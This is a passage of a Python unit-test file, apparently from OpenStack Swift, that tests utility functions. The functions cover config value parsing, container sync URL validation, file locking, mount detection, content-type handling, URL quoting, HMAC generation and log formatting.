X-Container-Sync-To format " "'//us/invalid1/a/'", None, None, None)), ('//us/invalid1/a', ("Invalid X-Container-Sync-To format " "'//us/invalid1/a'", None, None, None)), ('//us/invalid1/', ("Invalid X-Container-Sync-To format " "'//us/invalid1/'", None, None, None)), ('//us/invalid1', ("Invalid X-Container-Sync-To format " "'//us/invalid1'", None, None, None)), ('//us/', ("Invalid X-Container-Sync-To format " "'//us/'", None, None, None)), ('//us', ("Invalid X-Container-Sync-To format " "'//us'", None, None, None))): if badurl.startswith('//') and not realms_conf: self.assertEqual( utils.validate_sync_to( badurl, ['1.1.1.1', '2.2.2.2'], realms_conf), (None, None, None, None)) else: self.assertEqual( utils.validate_sync_to( badurl, ['1.1.1.1', '2.2.2.2'], realms_conf), result) def test_TRUE_VALUES(self): for v in utils.TRUE_VALUES: self.assertEqual(v, v.lower()) def test_config_true_value(self): orig_trues = utils.TRUE_VALUES try: utils.TRUE_VALUES = 'hello world'.split() for val in 'hello world HELLO WORLD'.split(): self.assertTrue(utils.config_true_value(val) is True) self.assertTrue(utils.config_true_value(True) is True) self.assertTrue(utils.config_true_value('foo') is False) self.assertTrue(utils.config_true_value(False) is False) finally: utils.TRUE_VALUES = orig_trues def test_config_positive_int_value(self): expectations = { # value : expected, u'1': 1, b'1': 1, 1: 1, u'2': 2, b'2': 2, u'1024': 1024, b'1024': 1024, u'0': ValueError, b'0': ValueError, u'-1': ValueError, b'-1': ValueError, u'0x01': ValueError, b'0x01': ValueError, u'asdf': ValueError, b'asdf': ValueError, None: ValueError, 0: ValueError, -1: ValueError, u'1.2': ValueError, # string expresses float should be value error b'1.2': ValueError, # string expresses float should be value error } for value, expected in expectations.items(): try: rv = utils.config_positive_int_value(value) except Exception as e: if e.__class__ is not expected: raise else: self.assertEqual( 'Config option must be an positive int number, ' 'not "%s".' % value, e.args[0]) else: self.assertEqual(expected, rv) def test_config_float_value(self): for args, expected in ( ((99, None, None), 99.0), ((99.01, None, None), 99.01), (('99', None, None), 99.0), (('99.01', None, None), 99.01), ((99, 99, None), 99.0), ((99.01, 99.01, None), 99.01), (('99', 99, None), 99.0), (('99.01', 99.01, None), 99.01), ((99, None, 99), 99.0), ((99.01, None, 99.01), 99.01), (('99', None, 99), 99.0), (('99.01', None, 99.01), 99.01), ((-99, -99, -99), -99.0), ((-99.01, -99.01, -99.01), -99.01), (('-99', -99, -99), -99.0), (('-99.01', -99.01, -99.01), -99.01),): actual = utils.config_float_value(*args) self.assertEqual(expected, actual) for val, minimum in ((99, 100), ('99', 100), (-99, -98), ('-98.01', -98)): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, minimum=minimum) self.assertIn('greater than %s' % minimum, cm.exception.args[0]) self.assertNotIn('less than', cm.exception.args[0]) for val, maximum in ((99, 98), ('99', 98), (-99, -100), ('-97.9', -98)): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, maximum=maximum) self.assertIn('less than %s' % maximum, cm.exception.args[0]) self.assertNotIn('greater than', cm.exception.args[0]) for val, minimum, maximum in ((99, 99, 98), ('99', 100, 100), (99, 98, 98),): with self.assertRaises(ValueError) as cm: utils.config_float_value(val, minimum=minimum, maximum=maximum) self.assertIn('greater than %s' % minimum, cm.exception.args[0]) self.assertIn('less than %s' % maximum, cm.exception.args[0]) def test_config_auto_int_value(self): expectations = { # (value, default) : expected, ('1', 0): 1, (1, 0): 1, ('asdf', 0): ValueError, ('auto', 1): 1, ('AutO', 1): 1, ('Aut0', 1): ValueError, (None, 1): 1, } for (value, default), expected in expectations.items(): try: rv = utils.config_auto_int_value(value, default) except Exception as e: if e.__class__ is not expected: raise else: self.assertEqual(expected, rv) def test_streq_const_time(self): self.assertTrue(utils.streq_const_time('abc123', 'abc123')) self.assertFalse(utils.streq_const_time('a', 'aaaaa')) self.assertFalse(utils.streq_const_time('ABC123', 'abc123')) def test_quorum_size(self): expected_sizes = {1: 1, 2: 1, 3: 2, 4: 2, 5: 3} got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes]) self.assertEqual(expected_sizes, got_sizes) def test_majority_size(self): expected_sizes = {1: 1, 2: 2, 3: 2, 4: 3, 5: 3} got_sizes = dict([(n, utils.majority_size(n)) for n in expected_sizes]) self.assertEqual(expected_sizes, got_sizes) def test_rsync_ip_ipv4_localhost(self): self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1') def test_rsync_ip_ipv6_random_ip(self): self.assertEqual( utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'), '[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]') def test_rsync_ip_ipv6_ipv4_compatible(self): self.assertEqual( utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]') def test_rsync_module_interpolation(self): fake_device = {'ip': '127.0.0.1', 'port': 11, 'replication_ip': '127.0.0.2', 'replication_port': 12, 'region': '1', 'zone': '2', 'device': 'sda1', 'meta': 'just_a_string'} self.assertEqual( utils.rsync_module_interpolation('{ip}', fake_device), '127.0.0.1') self.assertEqual( utils.rsync_module_interpolation('{port}', fake_device), '11') self.assertEqual( utils.rsync_module_interpolation('{replication_ip}', fake_device), '127.0.0.2') self.assertEqual( utils.rsync_module_interpolation('{replication_port}', fake_device), '12') self.assertEqual( utils.rsync_module_interpolation('{region}', fake_device), '1') self.assertEqual( utils.rsync_module_interpolation('{zone}', fake_device), '2') self.assertEqual( utils.rsync_module_interpolation('{device}', fake_device), 'sda1') self.assertEqual( utils.rsync_module_interpolation('{meta}', fake_device), 'just_a_string') self.assertEqual( utils.rsync_module_interpolation('{replication_ip}::object', fake_device), '127.0.0.2::object') self.assertEqual( utils.rsync_module_interpolation('{ip}::container{port}', fake_device), '127.0.0.1::container11') self.assertEqual( utils.rsync_module_interpolation( '{replication_ip}::object_{device}', fake_device), '127.0.0.2::object_sda1') self.assertEqual( utils.rsync_module_interpolation( '127.0.0.3::object_{replication_port}', fake_device), '127.0.0.3::object_12') self.assertRaises(ValueError, utils.rsync_module_interpolation, '{replication_ip}::object_{deivce}', fake_device) def test_generate_trans_id(self): fake_time = 1366428370.5163341 with patch.object(utils.time, 'time', return_value=fake_time): trans_id = utils.generate_trans_id('') self.assertEqual(len(trans_id), 34) self.assertEqual(trans_id[:2], 'tx') self.assertEqual(trans_id[23], '-') self.assertEqual(int(trans_id[24:], 16), int(fake_time)) with patch.object(utils.time, 'time', return_value=fake_time): trans_id = utils.generate_trans_id('-suffix') self.assertEqual(len(trans_id), 41) self.assertEqual(trans_id[:2], 'tx') self.assertEqual(trans_id[34:], '-suffix') self.assertEqual(trans_id[23], '-') self.assertEqual(int(trans_id[24:34], 16), int(fake_time)) def test_get_trans_id_time(self): ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e') self.assertIsNone(ts) ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06') self.assertEqual(ts, 1366428678) self.assertEqual( time.asctime(time.gmtime(ts)) + ' UTC', 'Sat Apr 20 03:31:18 2013 UTC') ts = utils.get_trans_id_time( 'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix') self.assertEqual(ts, 1366428678) self.assertEqual( time.asctime(time.gmtime(ts)) + ' UTC', 'Sat Apr 20 03:31:18 2013 UTC') ts = utils.get_trans_id_time('') self.assertIsNone(ts) ts = utils.get_trans_id_time('garbage') self.assertIsNone(ts) ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright') self.assertIsNone(ts) def test_config_fallocate_value(self): fallocate_value, is_percent = utils.config_fallocate_value('10%') self.assertEqual(fallocate_value, 10) self.assertTrue(is_percent) fallocate_value, is_percent = utils.config_fallocate_value('10') self.assertEqual(fallocate_value, 10) self.assertFalse(is_percent) try: fallocate_value, is_percent = utils.config_fallocate_value('ab%') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: ab% is an invalid value for ' 'fallocate_reserve.') try: fallocate_value, is_percent = utils.config_fallocate_value('ab') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: ab is an invalid value for ' 'fallocate_reserve.') try: fallocate_value, is_percent = utils.config_fallocate_value('1%%') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: 1%% is an invalid value for ' 'fallocate_reserve.') try: fallocate_value, is_percent = utils.config_fallocate_value('10.0') except ValueError as err: exc = err self.assertEqual(str(exc), 'Error: 10.0 is an invalid value for ' 'fallocate_reserve.') fallocate_value, is_percent = utils.config_fallocate_value('10.5%') self.assertEqual(fallocate_value, 10.5) self.assertTrue(is_percent) fallocate_value, is_percent = utils.config_fallocate_value('10.000%') self.assertEqual(fallocate_value, 10.000) self.assertTrue(is_percent) def test_lock_file(self): flags = os.O_CREAT | os.O_RDWR with NamedTemporaryFile(delete=False) as nt: nt.write(b"test string") nt.flush() nt.close() with utils.lock_file(nt.name, unlink=False) as f: self.assertEqual(f.read(), b"test string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) with utils.lock_file(nt.name, unlink=False, append=True) as f: f.seek(0) self.assertEqual(f.read(), b"test string") f.seek(0) f.write(b"\nanother string") f.flush() f.seek(0) self.assertEqual(f.read(), b"test string\nanother string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) with utils.lock_file(nt.name, timeout=3, unlink=False) as f: try: with utils.lock_file( nt.name, timeout=1, unlink=False) as f: self.assertTrue( False, "Expected LockTimeout exception") except LockTimeout: pass with utils.lock_file(nt.name, unlink=True) as f: self.assertEqual(f.read(), b"test string\nanother string") # we have a lock, now let's try to get a newer one fd = os.open(nt.name, flags) self.assertRaises( IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) self.assertRaises(OSError, os.remove, nt.name) def test_lock_file_unlinked_after_open(self): os_open = os.open first_pass = [True] def deleting_open(filename, flags): # unlink the file after it's opened. once. fd = os_open(filename, flags) if first_pass[0]: os.unlink(filename) first_pass[0] = False return fd with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.open', deleting_open): with utils.lock_file(nt.name, unlink=True) as f: self.assertNotEqual(os.fstat(nt.fileno()).st_ino, os.fstat(f.fileno()).st_ino) first_pass = [True] def recreating_open(filename, flags): # unlink and recreate the file after it's opened fd = os_open(filename, flags) if first_pass[0]: os.unlink(filename) os.close(os_open(filename, os.O_CREAT | os.O_RDWR)) first_pass[0] = False return fd with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.open', recreating_open): with utils.lock_file(nt.name, unlink=True) as f: self.assertNotEqual(os.fstat(nt.fileno()).st_ino, os.fstat(f.fileno()).st_ino) def test_lock_file_held_on_unlink(self): os_unlink = os.unlink def flocking_unlink(filename): # make sure the lock is held when we unlink fd = os.open(filename, os.O_RDWR) self.assertRaises( IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB) os.close(fd) os_unlink(filename) with NamedTemporaryFile(delete=False) as nt: with mock.patch('os.unlink', flocking_unlink): with utils.lock_file(nt.name, unlink=True): pass def test_lock_file_no_unlink_if_fail(self): os_open = os.open with NamedTemporaryFile(delete=True) as nt: def lock_on_open(filename, flags): # lock the file on another fd after it's opened. fd = os_open(filename, flags) fd2 = os_open(filename, flags) fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB) return fd try: timedout = False with mock.patch('os.open', lock_on_open): with utils.lock_file(nt.name, unlink=False, timeout=0.01): pass except LockTimeout: timedout = True self.assertTrue(timedout) self.assertTrue(os.path.exists(nt.name)) def test_ismount_path_does_not_exist(self): tmpdir = mkdtemp() try: self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar'))) finally: shutil.rmtree(tmpdir) def test_ismount_path_not_mount(self): tmpdir = mkdtemp() try: self.assertFalse(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_path_error(self): def _mock_os_lstat(path): raise OSError(13, "foo") tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): # Raises exception with _raw -- see next test. utils.ismount(tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_raw_path_error(self): def _mock_os_lstat(path): raise OSError(13, "foo") tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertRaises(OSError, utils.ismount_raw, tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_path_is_symlink(self): tmpdir = mkdtemp() try: link = os.path.join(tmpdir, "tmp") rdir = os.path.join(tmpdir, "realtmp") os.mkdir(rdir) os.symlink(rdir, link) self.assertFalse(utils.ismount(link)) # Can add a stubfile to make it pass with open(os.path.join(link, ".ismount"), "w"): pass self.assertTrue(utils.ismount(link)) finally: shutil.rmtree(tmpdir) def test_ismount_path_is_root(self): self.assertTrue(utils.ismount('/')) def test_ismount_parent_path_error(self): _os_lstat = os.lstat def _mock_os_lstat(path): if path.endswith(".."): raise OSError(13, "foo") else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): # Raises exception with _raw -- see next test. utils.ismount(tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_raw_parent_path_error(self): _os_lstat = os.lstat def _mock_os_lstat(path): if path.endswith(".."): raise OSError(13, "foo") else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertRaises(OSError, utils.ismount_raw, tmpdir) finally: shutil.rmtree(tmpdir) def test_ismount_successes_dev(self): _os_lstat = os.lstat class MockStat(object): def __init__(self, mode, dev, ino): self.st_mode = mode self.st_dev = dev self.st_ino = ino def _mock_os_lstat(path): if path.endswith(".."): parent = _os_lstat(path) return MockStat(parent.st_mode, parent.st_dev + 1, parent.st_ino) else: return _os_lstat(path) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_successes_ino(self): _os_lstat = os.lstat class MockStat(object): def __init__(self, mode, dev, ino): self.st_mode = mode self.st_dev = dev self.st_ino = ino def _mock_os_lstat(path): if path.endswith(".."): return _os_lstat(path) else: parent_path = os.path.join(path, "..") child = _os_lstat(path) parent = _os_lstat(parent_path) return MockStat(child.st_mode, parent.st_ino, child.st_dev) tmpdir = mkdtemp() try: with patch("os.lstat", _mock_os_lstat): self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_ismount_successes_stubfile(self): tmpdir = mkdtemp() fname = os.path.join(tmpdir, ".ismount") try: with open(fname, "w") as stubfile: stubfile.write("") self.assertTrue(utils.ismount(tmpdir)) finally: shutil.rmtree(tmpdir) def test_parse_content_type(self): self.assertEqual(utils.parse_content_type('text/plain'), ('text/plain', [])) self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'), ('text/plain', [('charset', 'utf-8')])) self.assertEqual( utils.parse_content_type('text/plain;hello="world";charset=utf-8'), ('text/plain', [('hello', '"world"'), ('charset', 'utf-8')])) self.assertEqual( utils.parse_content_type('text/plain; hello="world"; a=b'), ('text/plain', [('hello', '"world"'), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x="\""; a=b'), ('text/plain', [('x', r'"\""'), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x; a=b'), ('text/plain', [('x', ''), ('a', 'b')])) self.assertEqual( utils.parse_content_type(r'text/plain; x="\""; a'), ('text/plain', [('x', r'"\""'), ('a', '')])) def test_override_bytes_from_content_type(self): listing_dict = { 'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv', 'content_type': 'text/plain; hello="world"; swift_bytes=15'} utils.override_bytes_from_content_type(listing_dict, logger=FakeLogger()) self.assertEqual(listing_dict['bytes'], 15) self.assertEqual(listing_dict['content_type'], 'text/plain;hello="world"') listing_dict = { 'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv', 'content_type': 'text/plain; hello="world"; swift_bytes=hey'} utils.override_bytes_from_content_type(listing_dict, logger=FakeLogger()) self.assertEqual(listing_dict['bytes'], 1234) self.assertEqual(listing_dict['content_type'], 'text/plain;hello="world"') def test_extract_swift_bytes(self): scenarios = { # maps input value -> expected returned tuple '': ('', None), 'text/plain': ('text/plain', None), 'text/plain; other=thing': ('text/plain;other=thing', None), 'text/plain; swift_bytes=123': ('text/plain', '123'), 'text/plain; other=thing;swift_bytes=123': ('text/plain;other=thing', '123'), 'text/plain; swift_bytes=123; other=thing': ('text/plain;other=thing', '123'), 'text/plain; swift_bytes=123; swift_bytes=456': ('text/plain', '456'), 'text/plain; swift_bytes=123; other=thing;swift_bytes=456': ('text/plain;other=thing', '456')} for test_value, expected in scenarios.items(): self.assertEqual(expected, utils.extract_swift_bytes(test_value)) def test_clean_content_type(self): subtests = { '': '', 'text/plain': 'text/plain', 'text/plain; someother=thing': 'text/plain; someother=thing', 'text/plain; swift_bytes=123': 'text/plain', 'text/plain; someother=thing; swift_bytes=123': 'text/plain; someother=thing', # Since Swift always tacks on the swift_bytes, clean_content_type() # only strips swift_bytes if it's last. The next item simply shows # that if for some other odd reason it's not last, # clean_content_type() will not remove it from the header. 'text/plain; swift_bytes=123; someother=thing': 'text/plain; swift_bytes=123; someother=thing'} for before, after in subtests.items(): self.assertEqual(utils.clean_content_type(before), after) def test_get_valid_utf8_str(self): def do_test(input_value, expected): actual = utils.get_valid_utf8_str(input_value) self.assertEqual(expected, actual) self.assertIsInstance(actual, six.binary_type) actual.decode('utf-8') do_test(b'abc', b'abc') do_test(u'abc', b'abc') do_test(u'\uc77c\uc601', b'\xec\x9d\xbc\xec\x98\x81') do_test(b'\xec\x9d\xbc\xec\x98\x81', b'\xec\x9d\xbc\xec\x98\x81') # test some invalid UTF-8 do_test(b'\xec\x9d\xbc\xec\x98', b'\xec\x9d\xbc\xef\xbf\xbd') # check surrogate pairs, too do_test(u'\U0001f0a1', b'\xf0\x9f\x82\xa1'), do_test(u'\uD83C\uDCA1', b'\xf0\x9f\x82\xa1'), do_test(b'\xf0\x9f\x82\xa1', b'\xf0\x9f\x82\xa1'), do_test(b'\xed\xa0\xbc\xed\xb2\xa1', b'\xf0\x9f\x82\xa1'), def test_quote_bytes(self): self.assertEqual(b'/v1/a/c3/subdirx/', utils.quote(b'/v1/a/c3/subdirx/')) self.assertEqual(b'/v1/a%26b/c3/subdirx/', utils.quote(b'/v1/a&b/c3/subdirx/')) self.assertEqual(b'%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F', utils.quote(b'/v1/a&b/c3/subdirx/', safe='&')) self.assertEqual(b'abc_%EC%9D%BC%EC%98%81', utils.quote(u'abc_\uc77c\uc601'.encode('utf8'))) # Invalid utf8 is parsed as latin1, then re-encoded as utf8?? self.assertEqual(b'%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD', utils.quote(u'\uc77c\uc601'.encode('utf8')[::-1])) def test_quote_unicode(self): self.assertEqual(u'/v1/a/c3/subdirx/', utils.quote(u'/v1/a/c3/subdirx/')) self.assertEqual(u'/v1/a%26b/c3/subdirx/', utils.quote(u'/v1/a&b/c3/subdirx/')) self.assertEqual(u'%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F', utils.quote(u'/v1/a&b/c3/subdirx/', safe='&')) self.assertEqual(u'abc_%EC%9D%BC%EC%98%81', utils.quote(u'abc_\uc77c\uc601')) def test_get_hmac(self): self.assertEqual( utils.get_hmac('GET', '/path', 1, 'abc'), 'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f') def test_get_hmac_ip_range(self): self.assertEqual( utils.get_hmac('GET', '/path', 1, 'abc', ip_range='127.0.0.1'), 'b30dde4d2b8562b8496466c3b46b2b9ac5054461') def test_get_hmac_ip_range_non_binary_type(self): self.assertEqual( utils.get_hmac(u'GET', u'/path', 1, u'abc', ip_range=u'127.0.0.1'), 'b30dde4d2b8562b8496466c3b46b2b9ac5054461') def test_parse_override_options(self): # When override_<thing> is passed in, it takes precedence. opts = utils.parse_override_options( override_policies=[0, 1], override_devices=['sda', 'sdb'], override_partitions=[100, 200], policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1]) self.assertEqual(opts.devices, ['sda', 'sdb']) self.assertEqual(opts.partitions, [100, 200]) # When override_<thing> is passed in, it applies even in run-once # mode. opts = utils.parse_override_options( once=True, override_policies=[0, 1], override_devices=['sda', 'sdb'], override_partitions=[100, 200], policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1]) self.assertEqual(opts.devices, ['sda', 'sdb']) self.assertEqual(opts.partitions, [100, 200]) # In run-once mode, we honor the passed-in overrides. opts = utils.parse_override_options( once=True, policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, [0, 1, 2, 3]) self.assertEqual(opts.devices, ['sda', 'sdb', 'sdc', 'sdd']) self.assertEqual(opts.partitions, [100, 200, 300, 400]) # In run-forever mode, we ignore the passed-in overrides. opts = utils.parse_override_options( policies='0,1,2,3', devices='sda,sdb,sdc,sdd', partitions='100,200,300,400') self.assertEqual(opts.policies, []) self.assertEqual(opts.devices, []) self.assertEqual(opts.partitions, []) def test_get_policy_index(self): # Account has no information about a policy req = Request.blank( '/sda1/p/a', environ={'REQUEST_METHOD': 'GET'}) res = Response() self.assertIsNone(utils.get_policy_index(req.headers, res.headers)) # The policy of a container can be specified by the response header req = Request.blank( '/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'}) res = Response(headers={'X-Backend-Storage-Policy-Index': '1'}) self.assertEqual('1', utils.get_policy_index(req.headers, res.headers)) # The policy of an object to be created can be specified by the request # header req = Request.blank( '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Backend-Storage-Policy-Index': '2'}) res = Response() self.assertEqual('2', utils.get_policy_index(req.headers, res.headers)) def test_log_string_formatter(self): # Plain ASCII lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='Swift is', b='great'), 'Swift is great') lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='', b='great'), ' great') lf = utils.LogStringFormatter(default='-') self.assertEqual(lf.format('{a} {b}', a='', b='great'), '- great') lf = utils.LogStringFormatter(default='-', quote=True) self.assertEqual(lf.format('{a} {b}', a='', b='great'), '- great') lf = utils.LogStringFormatter(quote=True) self.assertEqual(lf.format('{a} {b}', a='Swift is', b='great'), 'Swift%20is great') # Unicode & co lf = utils.LogStringFormatter() self.assertEqual(lf.format('{a} {b}', a='Swift est', b=u'g\u00e9nial ^^'), u'Swift est g\u00e9nial ^^') lf = utils.LogStringFormatter(quote=True) self.assertEqual(lf.format('{a} {b}', a='Swift est', b=u'g\u00e9nial ^^'), 'Swift%20est g%C3%A9nial%20%5E%5E') def test_str_anonymizer(self): anon = utils.StrAnonymizer('Swift is great!', 'md5', '') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{MD5}45e6f00d48fdcf86213602a87df18772') anon = utils.StrAnonymizer('Swift is great!', 'sha1', '') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SHA1}0010a3df215495d8bfa0ae4b66acc2afcc8f4c5c') anon = utils.StrAnonymizer('Swift is great!', 'md5', 'salty_secret') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SMD5}ef4ce28fe3bdd10b6659458ceb1f3f0c') anon = utils.StrAnonymizer('Swift is great!', 'sha1', 'salty_secret') self.assertEqual(anon, 'Swift is great!') self.assertEqual(anon.anonymized, '{SSHA1}a4968f76acaddff0eb4069ebe8805d9cab44c9fe') self.assertRaises(ValueError, utils.StrAnonymizer, 'Swift is great!', 'sha257', '') def test_str_anonymizer_python_maddness(self): with mock.patch('swift.common.utils.hashlib') as mocklib: if six.PY2: # python <2.7.9 doesn't have this algorithms_guaranteed, but # our if block short-circuts before we explode mocklib.algorithms = hashlib.algorithms mocklib.algorithms_guaranteed.sideEffect = AttributeError() else: # python 3 doesn't have this algorithms but our if block # short-circuts before we explode mocklib.algorithms.sideEffect.sideEffect = AttributeError() mocklib.algorithms_guaranteed = hashlib.algorithms_guaranteed utils.StrAnonymizer('Swift is great!', 'sha1', '') self.assertRaises(ValueError, utils.StrAnonymizer, 'Swift is great!', 'sha257', '') def test_str_format_time(self): dt = utils.StrFormatTime(10000.123456789) self.assertEqual(str(dt), '10000.123456789') self.assertEqual(dt.datetime, '01/Jan/1970/02/46/40') self.assertEqual(dt.iso8601, '1970-01-01T02:46:40') self.assertEqual(dt.asctime, 'Thu Jan 1 02:46:40 1970') self.assertEqual(dt.s, '10000') self.assertEqual(dt.ms, '123') self.assertEqual(dt.us, '123456') self.assertEqual(dt.ns, '123456789') self.assertEqual(dt.a, 'Thu') self.assertEqual(dt.A, 'Thursday') self.assertEqual(dt.b, 'Jan') self.assertEqual(dt.B, 'January') self.assertEqual(dt.c, 'Thu Jan 1 02:46:40 1970') self.assertEqual(dt.d, '01') self.assertEqual(dt.H, '02') self.assertEqual(dt.I, '02') self.assertEqual(dt.j, '001') self.assertEqual(dt.m, '01') self.assertEqual(dt.M, '46') self.assertEqual(dt.p, 'AM') self.assertEqual(dt.S, '40') self.assertEqual(dt.U, '00') self.assertEqual(dt.w, '4') self.assertEqual(dt.W, '00') self.assertEqual(dt.x, '01/01/70') self.assertEqual(dt.X, '02:46:40') self.assertEqual(dt.y, '70') self.assertEqual(dt.Y, '1970') self.assertIn(dt.Z, ('GMT', 'UTC')) # It depends of Python 2/3 self.assertRaises(ValueError, getattr, dt, 'z') def test_get_log_line(self): req = Request.blank( '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'}) res = Response() trans_time = 1.2 additional_info = 'some information' server_pid = 1234 exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \ '/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -' with mock.patch('time.time', mock.MagicMock(side_effect=[10001.0])): with mock.patch( 'os.getpid', mock.MagicMock(return_value=server_pid)): self.assertEqual( exp_line, utils.get_log_line(req, res, trans_time, additional_info, utils.LOG_LINE_DEFAULT_FORMAT, 'md5', '54LT')) def test_cache_from_env(self): # should never get logging when swift.cache is found env = {'swift.cache': 42} logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env, False)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertEqual(42, utils.cache_from_env(env, True)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) # check allow_none controls logging when swift.cache is not found err_msg = 'ERROR: swift.cache could not be found in env!' env = {} logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env)) self.assertTrue(err_msg in logger.get_lines_for_level('error')) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env, False)) self.assertTrue(err_msg in logger.get_lines_for_level('error')) logger = FakeLogger() with mock.patch('swift.common.utils.logging', logger): self.assertIsNone(utils.cache_from_env(env, True)) self.assertEqual(0, len(logger.get_lines_for_level('error'))) def test_fsync_dir(self): tempdir = None fd = None try: tempdir = mkdtemp() fd, temppath = tempfile.mkstemp(dir=tempdir) _mock_fsync = mock.Mock() _mock_close = mock.Mock() with patch('swift.common.utils.fsync', _mock_fsync): with patch('os.close', _mock_close): utils.fsync_dir(tempdir) self.assertTrue(_mock_fsync.called) self.assertTrue(_mock_close.called) self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int)) self.assertEqual(_mock_fsync.call_args[0][0], _mock_close.call_args[0][0]) # Not a directory - arg is file path self.assertRaises(OSError, utils.fsync_dir, temppath) logger = FakeLogger() def _mock_fsync(fd): raise OSError(errno.EBADF, os.strerror(errno.EBADF)) with patch('swift.common.utils.fsync', _mock_fsync): with mock.patch('swift.common.utils.logging', logger): utils.fsync_dir(tempdir) self.assertEqual(1, len(logger.get_lines_for_level('warning'))) finally: if fd is not None: os.close(fd) os.unlink(temppath) if tempdir: os.rmdir(tempdir) def test_renamer_with_fsync_dir(self): tempdir = None try: tempdir = mkdtemp() # Simulate part of object path already existing part_dir = os.path.join(tempdir, 'objects/1234/') os.makedirs(part_dir) obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32) obj_path = os.path.join(obj_dir, '1425276031.12345.data') # Object dir had to be created _m_os_rename = mock.Mock() _m_fsync_dir = mock.Mock() with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.renamer("fake_path", obj_path) _m_os_rename.assert_called_once_with('fake_path', obj_path) # fsync_dir on parents of all newly create dirs self.assertEqual(_m_fsync_dir.call_count, 3) # Object dir existed _m_os_rename.reset_mock() _m_fsync_dir.reset_mock() with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.renamer("fake_path", obj_path) _m_os_rename.assert_called_once_with('fake_path', obj_path) # fsync_dir only on the leaf dir self.assertEqual(_m_fsync_dir.call_count, 1) finally: if tempdir: shutil.rmtree(tempdir) def test_renamer_when_fsync_is_false(self): _m_os_rename = mock.Mock() _m_fsync_dir = mock.Mock() _m_makedirs_count = mock.Mock(return_value=2) with patch('os.rename', _m_os_rename): with patch('swift.common.utils.fsync_dir', _m_fsync_dir): with patch('swift.common.utils.makedirs_count', _m_makedirs_count): 